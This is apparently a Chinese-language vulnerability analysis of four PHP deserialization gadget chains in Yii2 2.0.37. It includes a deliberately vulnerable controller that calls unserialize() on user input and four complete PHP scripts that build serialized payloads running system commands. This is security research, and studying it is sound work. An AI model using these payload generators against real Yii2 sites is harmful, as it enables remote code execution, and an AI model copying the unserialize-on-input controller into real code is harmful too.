环境配置
安装:在 https://github.com/yiisoft/yii2/releases 下载2.0.37
的版本
一开始就报了这个错误
data:image/s3,"s3://crabby-images/d922b/d922bea944ea533ed5aef2dcfa96ebd59f3ce6c6" alt="R09RCn.png"
查了资料才知道要给 yii-basic-app-2.0.37\basic\config\web.php
中的cookieValidationKey
赋值,内容随意。
data:image/s3,"s3://crabby-images/823f9/823f9aa01b814756f870f3ee9312285124560e40" alt="R096EQ.png"
运行成功
data:image/s3,"s3://crabby-images/e146d/e146d0800385904d484bbd37016fe917d385d978" alt="R09cNj.png"
新建控制器controllers\TestController.php
,参数
data:image/s3,"s3://crabby-images/7c6e2/7c6e295546aed47bcb190b60a652b9b128815afc" alt="R09rDS.png"
1 2 3 4 5 6 7 8 9
| <?php namespace app\controllers; use yii\web\Controller;
class TestController extends Controller{ public function actionTest($name){ return unserialize($name); } }
|
漏洞分析
利用链一
/vendor/yiisoft/yii2/db/BatchQueryResult.php
存在__destruct()
data:image/s3,"s3://crabby-images/ab82b/ab82b0fdb0f91c304675fcc7226bed458f573263" alt="R095uT.png"
/vendor/yiisoft/yii2/db/BatchQueryResult.php
调用了不存在的方法close()
,可以触发__call
data:image/s3,"s3://crabby-images/2836b/2836b3f5df9ae241a4f91f885438b131ddebe92b" alt="R09g4s.png"
/vendor/fzaninotto/faker/src/Faker/Generator.php
调用format()
data:image/s3,"s3://crabby-images/f5f95/f5f95c1db76ad9e68b408af6d7cdb5485ad60785" alt="R09IDU.png"
/vendor/fzaninotto/faker/src/Faker/Generator.php
这里调用了call_user_func_array
,执行的函数名来自于$this->getFormatter($formatter)
data:image/s3,"s3://crabby-images/afe3d/afe3d2c2f3b04de6e00a2e906b2e54c6bacc0307" alt="R09W3q.png"
/vendor/fzaninotto/faker/src/Faker/Generator.php
只要给$this->formatters[$formatters]
赋值函数名即可,这里的$formatter
是调用的不存在方法名,也就是close
data:image/s3,"s3://crabby-images/6d2e9/6d2e983016e4ebb89e9256ffa54fbf853a29808c" alt="R09fg0.png"
到这里只能控制函数名,不能控制函数参数,先执行一下phpinfo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
| <?php
namespace Faker{ class Generator{ protected $formatters=array(); public function __construct($formatters) { $this->formatters=$formatters; } } }
namespace yii\db{ class BatchQueryResult { private $_dataReader; public function __construct($_dataReader) { $this->_dataReader=$_dataReader; }
} }
namespace {
$a=new Faker\Generator(array('close'=>'phpinfo')); $b=new yii\db\BatchQueryResult($a); echo urlencode(serialize($b)); }
|
执行成功
data:image/s3,"s3://crabby-images/15d74/15d74d8f5c7f8563c05b27012012fb498caf5360" alt="R09hvV.png"
现在还存在一个问题,我们只能控制函数名,函数参数不可控。这里可以尝试利用call_user_func_array调用其他类的方法,传入call_user_func_array([类=>方法],array())
即可,这里要调用IndexAction.php
的run
就传入array(IndexAction类实例,'run')
data:image/s3,"s3://crabby-images/afe3d/afe3d2c2f3b04de6e00a2e906b2e54c6bacc0307" alt="R09W3q.png"
下面是两个可利用的方法,函数名和参数都为属性,可以执行命令
/vendor/yiisoft/yii2/rest/IndexAction.php
data:image/s3,"s3://crabby-images/04f63/04f63c116a069dbc1516c17769568635e58f3e2a" alt="R09obF.png"
/vendor/yiisoft/yii2/rest/CreateAction.php
data:image/s3,"s3://crabby-images/24cd5/24cd55c6a662c0fe34b016d9ef9b2dfc36d4f196" alt="R097E4.png"
修改exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42
| <?php
namespace Faker{ class Generator{ protected $formatters=array(); public function __construct($formatters) { $this->formatters=$formatters; } } }
namespace yii\db{ class BatchQueryResult { private $_dataReader; public function __construct($_dataReader) { $this->_dataReader=$_dataReader; }
} }
namespace yii\rest{ class IndexAction{ public $checkAccess; public $id; public function __construct() { $this->checkAccess='system'; $this->id='whoami'; } } }
namespace { $c=new \yii\rest\IndexAction(); $a=new Faker\Generator(array('close'=>array($c,'run'))); $b=new yii\db\BatchQueryResult($a); echo urlencode(serialize($b)); }
|
可以执行命令
data:image/s3,"s3://crabby-images/bd11a/bd11a9f5356ecf42b9901e2ac3e04016ed163783" alt="R09HUJ.png"
利用链二
/vendor/yiisoft/yii2/db/BatchQueryResult.php
还是同一个起点,但是这次是利用close()
而不是__call()
data:image/s3,"s3://crabby-images/ab82b/ab82b0fdb0f91c304675fcc7226bed458f573263" alt="R095uT.png"
/vendor/yiisoft/yii2/db/BatchQueryResult.php
调用close()
data:image/s3,"s3://crabby-images/2836b/2836b3f5df9ae241a4f91f885438b131ddebe92b" alt="R09g4s.png"
可用的close()
/vendor/yiisoft/yii2/web/DbSession.php
调用了composeFields()
data:image/s3,"s3://crabby-images/29ca9/29ca95c5d42f7335a006f448f27a3c519f589840" alt="R09b59.png"
/vendor/yiisoft/yii2/web/MultiFieldSession.php
这里出现了call_user_func,让$this->writeCallback
等于array(IndexAction类实例,'run')
就可以直接调用run
执行命令了
data:image/s3,"s3://crabby-images/44e4c/44e4c4be7daf343dc3a7ce451af3a4dc845924eb" alt="R09O81.png"
构造exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
| <?php
namespace yii\db{ class BatchQueryResult{ private $_dataReader; public function __construct($_dataReader) { $this->_dataReader=$_dataReader; } } }
namespace yii\web{ class DbSession{ public $writeCallback; public function __construct($writeCallback) { $this->writeCallback=$writeCallback; } } }
namespace yii\rest{ class IndexAction{ public $checkAccess; public $id; public function __construct() { $this->checkAccess='system'; $this->id='whoami'; } } } namespace {
$c=new \yii\rest\IndexAction(); $b=new yii\web\DbSession(array($c,'run')); $a=new yii\db\BatchQueryResult($b); echo urlencode(serialize($a));
}
|
成功执行
data:image/s3,"s3://crabby-images/d83fe/d83feddbac1e1b74a717748bfac55c8bbb8c613d" alt="R0CSbD.png"
利用链三
/vendor/codeception/codeception/ext/RunProcess.php
存在__destruct()
,调用stopProcess
data:image/s3,"s3://crabby-images/ff5d7/ff5d752c486cdc6cf9f17f366744c14f4632581e" alt="R09LCR.png"
/vendor/codeception/codeception/ext/RunProcess.php
$this->processes->isRunning
调用不存在的方法触发__call
,接下来就跟上面一样了
data:image/s3,"s3://crabby-images/b1cda/b1cdab711861532379b2388148f3b807899dc43d" alt="R09Xgx.png"
构造exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53
| <?php
namespace Codeception\Extension{ class RunProcess{ private $processes = array(); public function __construct($processes) { $this->processes=$processes; } } }
namespace Faker{ class Generator{ protected $formatters=array(); public function __construct($formatters) { $this->formatters=$formatters; } } }
namespace yii\db{ class BatchQueryResult { private $_dataReader; public function __construct($_dataReader) { $this->_dataReader=$_dataReader; }
} }
namespace yii\rest{ class IndexAction{ public $checkAccess; public $id; public function __construct() { $this->checkAccess='system'; $this->id='whoami'; } } }
namespace { $c=new \yii\rest\IndexAction(); $a=new Faker\Generator(array('isRunning'=>array($c,'run')));
$b=new Codeception\Extension\RunProcess(array('add'=>$a)); echo urlencode(serialize($b)); }
|
data:image/s3,"s3://crabby-images/d83fe/d83feddbac1e1b74a717748bfac55c8bbb8c613d" alt="R0CSbD.png"
利用链四
/vendor/swiftmailer/swiftmailer/lib/classes/Swift/KeyCache/DiskKeyCache.php
存在__destruct()
,但需要先为$this->keys
赋值才能进入循环触发clearAll
data:image/s3,"s3://crabby-images/b48d0/b48d09e7bd259627e645fcc165597b7ca96624d9" alt="R0CCUH.png"
/vendor/swiftmailer/swiftmailer/lib/classes/Swift/KeyCache/DiskKeyCache.php
clearAll()
中存在拼接字符串操作,触发__toString()
data:image/s3,"s3://crabby-images/af820/af820a83707fc18043eff111cd6e60424a800bda" alt="R09jv6.png"
查找到可利用的__toString
,调用了不存在的方法,再次触发__call
,回到原来的利用链
data:image/s3,"s3://crabby-images/17c99/17c997220ec22bbcebe8c20d604fa8df23ec9b30" alt="R09xKK.png"
构造exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61
| <?php
namespace{ //__destruct class Swift_KeyCache_DiskKeyCache { private $path; private $keys = []; public function __construct($path) { $this->path=$path; $this->keys=['a'=>'a']; } } }
namespace Codeception\Util{ //__toString class XmlBuilder { protected $__dom__; public function __construct($__dom__) { $this->__dom__=$__dom__; } } }
namespace Faker{ //__call class Generator{ protected $formatters=array(); public function __construct($formatters) { $this->formatters=$formatters; } } }
namespace yii\rest{ //run class IndexAction{ public $checkAccess; public $id; public function __construct() { $this->checkAccess='system'; $this->id='whoami'; } } }
namespace {
$c=new \yii\rest\IndexAction(); $a=new Faker\Generator(array('saveXML'=>array($c,'run'))); $x=new Codeception\Util\XmlBuilder($a); $aa=new Swift_KeyCache_DiskKeyCache($x); echo urlencode(serialize($aa)); }
|
成功执行
data:image/s3,"s3://crabby-images/8b915/8b915a2510b63260bb22bda2498b8283dc854d55" alt="R09zDO.png"
总结
这几条利用链大同小异,主要都是利用Generator.php中的__call()
和IndexAction.php中的run()
利用链一
- BatchQueryResult.php中
__destruct()
- BatchQueryResult.ph中的
reset()
- Generator.php中的
__call()
- Generator.php中的
format()
- Generator.php中的
call_user_func_array($this->getFormatter($formatter), $arguments);
- IndexAction.php中的
run()
data:image/s3,"s3://crabby-images/5f270/5f2709f7d4cf229fcb2d2c63dcf3f9024cf4457e" alt="R0Ck8I.png"
利用链二
- BatchQueryResult.php中
__destruct()
- BatchQueryResult.ph中的
reset()
- DbSession.php中的
close()
`
- MultiFieldsSession.php中的
composeFields()
调用call_user_func
- IndexAction.php中的
run()
data:image/s3,"s3://crabby-images/32226/322262a98ac3b8fbd82c9d1e4df714fdaa8d9dcc" alt="R0CA2t.png"
利用链三
- RunProcess.php中的
__destruct()
- RunProcess.php中的
stopProcess()
- Generator.php中的
__call()
- Generator.php中的
format()
- Generator.php中的
call_user_func_array($this->getFormatter($formatter), $arguments);
- IndexAction.php中的
run()
data:image/s3,"s3://crabby-images/0feb8/0feb8b715a24a3da8a7c7e359cda8a0475015b99" alt="R0CExP.png"
利用链四
- DiskeyCache.php中的
__destruct()
- DiskeyCache.php中的
clearAll()
触发__toString()
- XmlBuilder.php中的
__toString()
方法触发__call()
- Generator.php中的
__call()
- Generator.php中的
format()
- Generator.php中的
call_user_func_array($this->getFormatter($formatter), $arguments);
- IndexAction.php中的
run()
data:image/s3,"s3://crabby-images/c7c0f/c7c0fe15dd358bba858476206ffd43f900c64ada" alt="R0CZKf.png"
参考链接
https://www.secpulse.com/archives/161161.html